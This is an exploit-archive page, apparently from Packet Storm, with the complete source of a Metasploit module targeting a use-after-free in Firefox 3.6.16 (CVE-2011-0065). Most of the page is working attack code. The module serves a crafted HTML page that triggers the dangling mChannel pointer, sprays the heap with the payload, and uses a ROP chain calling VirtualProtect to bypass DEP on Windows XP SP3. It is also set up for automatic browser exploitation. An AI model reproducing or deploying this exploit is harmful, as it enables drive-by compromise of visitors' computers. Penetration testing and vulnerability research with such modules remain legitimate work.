exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Mozilla Firefox 3.6.16 mChannel Use After Free

Mozilla Firefox 3.6.16 mChannel Use After Free
Posted Aug 10, 2011
Authored by regenrecht, Rh0 | Site metasploit.com

This Metasploit module exploits an use after free vulnerability in Mozilla Firefox 3.6.16. An OBJECT Element mChannel can be freed via the OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel becomes a dangling pointer and can be reused when setting the OBJECTs data attribute. This Metasploit module uses heapspray with a minimal ROP chain to bypass DEP on Windows XP SP3.

tags | exploit
systems | windows
advisories | CVE-2011-0065, OSVDB-72085
SHA-256 | 5a6e9352732f91f5a6195ee7559b47f8ad02806dc4da4347ae745625e1ce1deb

Mozilla Firefox 3.6.16 mChannel Use After Free

Change Mirror Download
##
# $Id: mozilla_mchannel.rb 13507 2011-08-10 05:58:02Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML

include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::FF,
:ua_minver => "3.6.16",
:ua_maxver => "3.6.16",
:os_name => OperatingSystems::WINDOWS,
:javascript => true,
:rank => NormalRanking,
})

def initialize(info = {})
super(update_info(info,
'Name' => 'Mozilla Firefox 3.6.16 mChannel use after free vulnerability',
'Description' => %q{
This module exploits an use after free vulnerability in Mozilla
Firefox 3.6.16. An OBJECT Element mChannel can be freed via the
OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel
becomes a dangling pointer and can be reused when setting the OBJECTs
data attribute. (Discovered by regenrecht). This module uses heapspray
with a minimal ROP chain to bypass DEP on Windows XP SP3
},
'License' => MSF_LICENSE,
'Author' =>
[
'regenrecht', # discovery
'Rh0' # metasploit module
],
'Version' => "$Revision: 13507 $",
'References' =>
[
['CVE', '2011-0065'],
['OSVDB', '72085'],
['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=634986'],
['URL', 'http://www.mozilla.org/security/announce/2010/mfsa2011-13.html']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 1024,
},
'Targets' =>
[
[
'Firefox 3.6.16 on Windows XP SP3',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 10 2011'
))
end

def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli).encoded) == nil)

print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })

# Handle the payload
handler(cli)
end

def generate_html(payload)
# DEP bypass using xul.dll
custom_stack = [
0x1052c871, # mov esp,[ecx] / mov edx,5c86c6ff add [eax],eax / xor eax,eax / pop esi / retN 0x8
0x7c801ad4, # VirtualProtect
0xbeeff00d,
0xbeeff00d,
0x1003876B, # jmp esp
0x0c0c0048, # start address
0x00000400, # size 1024
0x00000040, # Page EXECUTE_READ_WRITE
0x0c0c0c00 # old protection
].pack("V*")

payload_buf = ''
payload_buf << custom_stack
payload_buf << payload
escaped_payload = Rex::Text.to_unescape(payload_buf)

#Random JavaScript variable names
js_element_name = rand_text_alpha(rand(10) + 5)
js_obj_addr_name = rand_text_alpha(rand(10) + 5)
js_sc_name = rand_text_alpha(rand(10) + 5)
js_ret_addr_name = rand_text_alpha(rand(10) + 5)
js_chunk_name = rand_text_alpha(rand(10) + 5)
js_final_chunk_name = rand_text_alpha(rand(10) + 5)
js_block_name = rand_text_alpha(rand(10) + 5)

#Reference: adobe_flashplayer_newfunction.rb
custom_js = <<-JS
#{js_element_name} = document.getElementById("d");
#{js_element_name}.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0);
#{js_obj_addr_name} = unescape("\\x0c%u0c0c");

var #{js_sc_name} = unescape("#{escaped_payload}");
var #{js_ret_addr_name} = unescape("%u0024%u0c0c");
while(#{js_ret_addr_name}.length+20+8 < 0x100000) {#{js_ret_addr_name} += #{js_ret_addr_name};}
var #{js_chunk_name} = #{js_ret_addr_name}.substring(0,(0x48-0x24)/2);
#{js_chunk_name} += #{js_sc_name};
#{js_chunk_name} += #{js_ret_addr_name};
var #{js_final_chunk_name} = #{js_chunk_name}.substring(0,0x10000/2);
while (#{js_final_chunk_name}.length<0x800000) {#{js_final_chunk_name} += #{js_final_chunk_name};}
var #{js_block_name} = #{js_final_chunk_name}.substring(0,0x80000 - (0x1020-0x08)/2);
array = new Array()
for (n=0;n<0x1f0;n++){
array[n] = #{js_block_name} + #{js_sc_name};
}

#{js_element_name}.data = "";
JS

#Remove the extra tabs
custom_js = custom_js.gsub(/^\t\t/, '')

html = <<-HTML
<html>
<body>
<object id="d"><object>
<script type="text/javascript">
#{custom_js}
</script>
</body>
</html>
HTML

return html
end

end
Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close